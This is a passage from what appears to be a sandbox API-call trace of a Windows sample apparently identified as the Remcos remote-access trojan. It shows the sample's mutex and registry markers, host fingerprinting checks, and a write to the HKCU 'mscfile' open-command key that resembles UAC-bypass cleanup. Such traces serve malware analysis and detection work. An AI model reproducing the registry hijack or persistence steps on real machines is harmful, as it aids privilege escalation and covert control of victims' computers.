Size=0x1b) returned 0xcb80f8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad2e8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x29) returned 0xcad9b8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1e) returned 0xcb8120 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x6b) returned 0xcb82e8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x17) returned 0xcb8360 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xf) returned 0xca4a70 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x16) returned 0xcb8380 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2a) returned 0xcad9f0 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x29) returned 0xcada28 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x16) returned 0xcb83a0 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x13) returned 0xcb83c0 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1f) returned 0xcb8148 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x12) returned 0xcb83f8 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x18) returned 0xcb8418 [0286.675] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x46) returned 0xca9508 [0286.676] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8ca0 | out: hHeap=0xc90000) returned 1 [0286.681] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0286.681] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeConditionVariable") returned 0x77a18456 [0286.682] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableCS") returned 0x76a450d2 [0286.683] GetProcAddress (hModule=0x769b0000, lpProcName="WakeAllConditionVariable") returned 0x77a4409d [0286.683] RtlInitializeConditionVariable () returned 0x46ccd0 [0286.683] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x769b0000 [0286.684] GetProcAddress (hModule=0x769b0000, lpProcName="FlsAlloc") returned 0x769c4ee3 [0286.684] GetProcAddress (hModule=0x769b0000, lpProcName="FlsFree") returned 0x769c354f [0286.685] GetProcAddress (hModule=0x769b0000, lpProcName="FlsGetValue") returned 0x769c1252 [0286.685] GetProcAddress (hModule=0x769b0000, lpProcName="FlsSetValue") returned 0x769c41c0 [0286.685] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeCriticalSectionEx") returned 0x769c4ce0 [0286.686] GetProcAddress (hModule=0x769b0000, lpProcName="InitOnceExecuteOnce") returned 0x769dd5f7 [0286.686] GetProcAddress (hModule=0x769b0000, lpProcName="CreateEventExW") returned 0x76a446ab [0286.687] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSemaphoreW") returned 0x769dca32 [0286.687] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSemaphoreExW") returned 0x76a44735 [0286.688] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolTimer") returned 0x769dee4e [0286.690] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadpoolTimer") returned 0x77a2441c [0286.690] GetProcAddress (hModule=0x769b0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77a4c50e [0286.691] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolTimer") returned 0x77a4c381 [0286.691] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolWait") returned 0x769df058 [0286.692] GetProcAddress (hModule=0x769b0000, lpProcName="SetThreadpoolWait") returned 0x77a305d7 [0286.692] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolWait") returned 0x77a4ca24 [0286.692] GetProcAddress (hModule=0x769b0000, lpProcName="FlushProcessWriteBuffers") returned 0x77a00b8c [0286.693] GetProcAddress (hModule=0x769b0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77abfde8 [0286.693] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentProcessorNumber") returned 0x77a51e1d [0286.694] GetProcAddress (hModule=0x769b0000, lpProcName="CreateSymbolicLinkW") returned 0x76a3d181 [0286.694] GetProcAddress (hModule=0x769b0000, lpProcName="GetCurrentPackageId") returned 0x0 [0286.695] GetProcAddress (hModule=0x769b0000, lpProcName="GetTickCount64") returned 0x769deeb0 [0286.695] GetProcAddress (hModule=0x769b0000, lpProcName="GetFileInformationByHandleEx") returned 0x769dc767 [0286.696] GetProcAddress (hModule=0x769b0000, lpProcName="SetFileInformationByHandle") returned 0x769ecbec [0286.696] GetProcAddress (hModule=0x769b0000, lpProcName="GetSystemTimePreciseAsFileTime") returned 0x0 [0286.697] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeConditionVariable") returned 0x77a18456 [0286.697] GetProcAddress (hModule=0x769b0000, lpProcName="WakeConditionVariable") returned 0x77a87de4 [0286.698] GetProcAddress (hModule=0x769b0000, lpProcName="WakeAllConditionVariable") returned 0x77a4409d [0286.698] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableCS") returned 0x76a450d2 [0286.699] GetProcAddress (hModule=0x769b0000, lpProcName="InitializeSRWLock") returned 0x77a18456 [0286.699] GetProcAddress (hModule=0x769b0000, lpProcName="AcquireSRWLockExclusive") returned 0x77a129f1 [0286.700] GetProcAddress (hModule=0x769b0000, lpProcName="TryAcquireSRWLockExclusive") returned 0x77a24892 [0286.700] GetProcAddress (hModule=0x769b0000, lpProcName="ReleaseSRWLockExclusive") returned 0x77a129ab [0286.700] GetProcAddress (hModule=0x769b0000, lpProcName="SleepConditionVariableSRW") returned 0x76a45114 [0286.701] GetProcAddress (hModule=0x769b0000, lpProcName="CreateThreadpoolWork") returned 0x769dee15 [0286.701] GetProcAddress (hModule=0x769b0000, lpProcName="SubmitThreadpoolWork") returned 0x77a58491 [0286.702] GetProcAddress (hModule=0x769b0000, lpProcName="CloseThreadpoolWork") returned 0x77a4d8e2 [0286.702] GetProcAddress (hModule=0x769b0000, lpProcName="CompareStringEx") returned 0x76a44c51 [0286.703] GetProcAddress (hModule=0x769b0000, lpProcName="GetLocaleInfoEx") returned 0x76a44cf1 [0286.703] GetProcAddress (hModule=0x769b0000, lpProcName="LCMapStringEx") returned 0x76a44d91 [0286.773] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x800) returned 0xcb97e0 [0286.774] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0286.776] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x43061a) returned 0x0 [0286.779] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x40) returned 0xca1fa0 [0286.780] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada60 [0286.786] RtlSizeHeap (HeapHandle=0xc90000, Flags=0x0, MemoryPointer=0xc92788) returned 0x80 [0286.786] RtlReAllocateHeap (Heap=0xc90000, Flags=0x0, Ptr=0xc92788, Size=0x100) returned 0xcba430 [0286.787] GetModuleHandleA (lpModuleName="User32.dll") returned 0x773b0000 [0286.787] GetProcAddress (hModule=0x773b0000, lpProcName="GetCursorInfo") returned 0x7742812f [0286.788] LoadLibraryA (lpLibFileName="User32.dll") returned 0x773b0000 [0286.788] GetProcAddress (hModule=0x773b0000, lpProcName="GetLastInputInfo") returned 0x773db382 [0286.788] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0286.789] GetProcAddress (hModule=0x769b0000, lpProcName="GetConsoleWindow") returned 0x76a68235 [0286.790] GetStartupInfoW (in: lpStartupInfo=0x18feb4 | out: lpStartupInfo=0x18feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0286.792] FindResourceA (hModule=0x400000, lpName="SETTINGS", lpType=0xa) returned 0x472158 [0286.792] LoadResource (hModule=0x400000, hResInfo=0x472158) returned 0x4765cc [0286.793] LockResource (hResData=0x4765cc) returned 0x4765cc [0286.793] SizeofResource (hModule=0x400000, hResInfo=0x472158) returned 0x57d [0286.793] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xd0) returned 0xcba538 [0286.793] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xe0) returned 0xcba610 [0286.794] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x4ac) returned 0xcba6f8 [0286.794] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x4b0) returned 0xcbabb0 [0286.795] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcba6f8 | out: hHeap=0xc90000) returned 1 [0286.795] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x4b0) returned 0xcba6f8 [0286.796] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0286.798] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x18) returned 0xcb8438 [0286.799] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcadad0 [0286.799] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0286.799] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0286.799] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8438 | out: hHeap=0xc90000) returned 1 [0286.799] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x48) returned 0xca9558 [0286.800] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0286.800] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x60) returned 0xc92788 [0286.800] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xca9558 | out: hHeap=0xc90000) returned 1 [0286.800] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x90) returned 0xcbb068 [0286.800] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xc92788 | out: hHeap=0xc90000) returned 1 [0286.800] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xd8) returned 0xcbb100 [0286.800] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb068 | out: hHeap=0xc90000) returned 1 [0286.800] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x138) returned 0xcbb1e0 [0286.801] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb100 | out: hHeap=0xc90000) returned 1 [0286.801] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8dd8 [0286.801] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8e00 [0286.801] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8dd8 | out: hHeap=0xc90000) returned 1 [0286.801] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x1c8) returned 0xcbb320 [0286.801] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb1e0 | out: hHeap=0xc90000) returned 1 [0286.801] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8dd8 [0286.801] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8e28 [0286.802] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8dd8 | out: hHeap=0xc90000) returned 1 [0286.802] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x2a0) returned 0xcbb068 [0286.802] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb320 | out: hHeap=0xc90000) returned 1 [0286.802] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0286.802] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcadb08 [0286.802] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0286.802] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x3f0) returned 0xcbb310 [0286.802] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb068 | out: hHeap=0xc90000) returned 1 [0286.802] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x5e8) returned 0xcbb708 [0286.803] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbb310 | out: hHeap=0xc90000) returned 1 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcadb40 [0286.803] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x110) returned 0xcbbcf8 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x110) returned 0xcbbe10 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x80) returned 0xc92788 [0286.803] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbbcf8 | out: hHeap=0xc90000) returned 1 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x80) returned 0xcbbf28 [0286.803] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x110) returned 0xcbbcf8 [0286.804] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xc92788 | out: hHeap=0xc90000) returned 1 [0286.804] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x110) returned 0xcbb068 [0286.805] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbbcf8 | out: hHeap=0xc90000) returned 1 [0286.805] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcba6f8 | out: hHeap=0xc90000) returned 1 [0286.805] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8dd8 [0286.806] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fbbc | out: phkResult=0x18fbbc*=0xcc) returned 0x0 [0286.807] RegQueryValueExA (in: hKey=0xcc, lpValueName="WD", lpReserved=0x0, lpType=0x18fbb4, lpData=0x18fbe0, lpcbData=0x18fbb8*=0x4 | out: lpType=0x18fbb4*=0x0, lpData=0x18fbe0*=0x0, lpcbData=0x18fbb8*=0x4) returned 0x2 [0286.807] RegCloseKey (hKey=0xcc) returned 0x0 [0286.807] OpenMutexA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Remcos_Mutex_Inj") returned 0x0 [0286.807] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fbbc | out: phkResult=0x18fbbc*=0xcc) returned 0x0 [0286.807] RegQueryValueExA (in: hKey=0xcc, lpValueName="Inj", lpReserved=0x0, lpType=0x18fbb4, lpData=0x18fbe4, lpcbData=0x18fbb8*=0x4 | out: lpType=0x18fbb4*=0x0, lpData=0x18fbe4*=0x0, lpcbData=0x18fbb8*=0x4) returned 0x2 [0286.807] RegCloseKey (hKey=0xcc) returned 0x0 [0286.807] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="Remcos-E6IJPZ") returned 0xcc [0286.808] GetLastError () returned 0x0 [0286.808] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x779b0000 [0286.811] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExA") returned 0x779b15bc [0286.811] LoadLibraryA (lpLibFileName="Psapi.dll") returned 0x779b0000 [0286.812] GetProcAddress (hModule=0x779b0000, lpProcName="GetModuleFileNameExW") returned 0x779b13f0 [0286.812] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x779e0000 [0286.812] GetProcAddress (hModule=0x779e0000, lpProcName="NtUnmapViewOfSection") returned 0x779ffc70 [0286.812] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x769b0000 [0287.034] GetProcAddress (hModule=0x769b0000, lpProcName="GlobalMemoryStatusEx") returned 0x769ed4b4 [0287.034] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0287.034] GetProcAddress (hModule=0x769b0000, lpProcName="IsWow64Process") returned 0x769c193e [0287.035] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0287.035] GetProcAddress (hModule=0x769b0000, lpProcName="GetComputerNameExW") returned 0x769ebb86 [0287.035] LoadLibraryA (lpLibFileName="Shell32") returned 0x75cb0000 [0287.036] GetProcAddress (hModule=0x75cb0000, lpProcName="IsUserAnAdmin") returned 0x75d044f5 [0287.037] GetModuleHandleA (lpModuleName="kernel32") returned 0x769b0000 [0287.037] GetProcAddress (hModule=0x769b0000, lpProcName="SetProcessDEPPolicy") returned 0x769deb6a [0287.037] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0287.038] GetProcAddress (hModule=0x773b0000, lpProcName="EnumDisplayDevicesW") returned 0x773ee567 [0287.038] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0287.038] GetProcAddress (hModule=0x773b0000, lpProcName="EnumDisplayMonitors") returned 0x773d451a [0287.039] GetModuleHandleA (lpModuleName="user32") returned 0x773b0000 [0287.039] GetProcAddress (hModule=0x773b0000, lpProcName="GetMonitorInfoW") returned 0x773d3000 [0287.039] LoadLibraryA (lpLibFileName="Shlwapi.dll") returned 0x771d0000 [0287.040] GetProcAddress (hModule=0x771d0000, lpProcName=0xc) returned 0x771e158a [0287.040] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x46daf8, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\99.exe")) returned 0x2b [0287.041] GetCurrentProcess () returned 0xffffffff [0287.041] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18fbc4 | out: Wow64Process=0x18fbc4*=1) returned 1 [0287.041] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fbb8 | out: phkResult=0x18fbb8*=0xd4) returned 0x0 [0287.042] RegQueryValueExA (in: hKey=0xd4, lpValueName="ProductName", lpReserved=0x0, lpType=0x0, lpData=0x18f7b4, lpcbData=0x18fbb4*=0x400 | out: lpType=0x0, lpData=0x18f7b4*=0x57, lpcbData=0x18fbb4*=0x17) returned 0x0 [0287.042] RegCloseKey (hKey=0xd4) returned 0x0 [0287.042] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8e50 [0287.042] IsUserAnAdmin () returned 1 [0287.044] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f7ac | out: phkResult=0x18f7ac*=0xdc) returned 0x0 [0287.044] RegQueryValueExA (in: hKey=0xdc, lpValueName="origmsc", lpReserved=0x0, lpType=0x0, lpData=0x18f7e0, lpcbData=0x18f7c4*=0x3e8 | out: lpType=0x0, lpData=0x18f7e0*=0xf8, lpcbData=0x18f7c4*=0x26) returned 0x0 [0287.044] RegCloseKey (hKey=0xdc) returned 0x0 [0287.044] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0287.044] RegCreateKeyA (in: hKey=0x80000001, lpSubKey="Software\\Classes\\mscfile\\shell\\open\\command", phkResult=0x18f7a4 | out: phkResult=0x18f7a4*=0xdc) returned 0x0 [0287.045] RegSetValueExA (in: hKey=0xdc, lpValueName="", Reserved=0x0, dwType=0x2, lpData="%SystemRoot%\\system32\\mmc.exe \"%1\" %*", cbData=0x25 | out: lpData="%SystemRoot%\\system32\\mmc.exe \"%1\" %*") returned 0x0 [0287.045] RegCloseKey (hKey=0xdc) returned 0x0 [0287.046] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0287.046] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x20) returned 0xcb8e78 [0287.047] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0x30) returned 0xcada98 [0287.049] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Remcos-E6IJPZ\\", ulOptions=0x0, samDesired=0x2, phkResult=0x18f748 | out: phkResult=0x18f748*=0xdc) returned 0x0 [0287.049] RegDeleteValueW (hKey=0xdc, lpValueName="origmsc") returned 0x0 [0287.050] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcada98 | out: hHeap=0xc90000) returned 1 [0287.050] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcb8e78 | out: hHeap=0xc90000) returned 1 [0287.050] GetEnvironmentStringsW () returned 0xcbbfb0* [0287.051] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x0, Size=0xb0e) returned 0xcbcac8 [0287.051] FreeEnvironmentStringsW (penv=0xcbbfb0) returned 1 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x98) returned 0xcbbcf8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2030 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x56) returned 0xcbbd98 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x6e) returned 0xc92788 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x78) returned 0xc9fd60 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x62) returned 0xcba6f8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcada98 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca9558 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x28) returned 0xcad318 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1a) returned 0xcb8e78 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x34) returned 0xcba768 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x5c) returned 0xcba7a8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x32) returned 0xcba810 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadb78 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1c) returned 0xcb8ea0 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x12a) returned 0xcba850 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x7c) returned 0xcba988 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbaa10 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3a) returned 0xca2078 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x90) returned 0xcbaa50 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad348 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcadbb0 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbaae8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca95a8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbab28 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3c) returned 0xca20c0 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0xd6) returned 0xcbb180 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadbe8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1e) returned 0xcb8ec8 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcadc20 [0287.052] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x54) returned 0xcbd5f8 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x52) returned 0xcbd658 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2c) returned 0xcadc58 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x26) returned 0xcad378 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2108 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad3a8 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcadc90 [0287.053] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x8c) returned 0xcbb260 [0287.054] HeapFree (in: hHeap=0xc90000, dwFlags=0x0, lpMem=0xcbcac8 | out: hHeap=0xc90000) returned 1 [0287.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2150 [0287.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xcb8030, cbMultiByte=-1, lpWideCharStr=0xca2150, cchWideChar=31 | out: lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData") returned 31 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x98) returned 0xcbb2f8 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3e) returned 0xca2198 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x56) returned 0xcbd6b8 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x6e) returned 0xcbb398 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x78) returned 0xc9fde0 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x62) returned 0xcbb410 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcadcc8 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x48) returned 0xca95f8 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x28) returned 0xcad3d8 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1a) returned 0xcb8ef0 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x34) returned 0xcbb480 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x5c) returned 0xcbb4c0 [0287.055] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x32) returned 0xcbb528 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x2e) returned 0xcadd00 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x1c) returned 0xcb8f18 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x12a) returned 0xcbb568 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x7c) returned 0xcbe5e0 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbb6a0 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x3a) returned 0xca21e0 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x90) returned 0xcbe668 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x24) returned 0xcad408 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x30) returned 0xcadd38 [0287.056] RtlAllocateHeap (HeapHandle=0xc90000, Flags=0x8, Size=0x36) returned 0xcbbfc8 [0287.056] 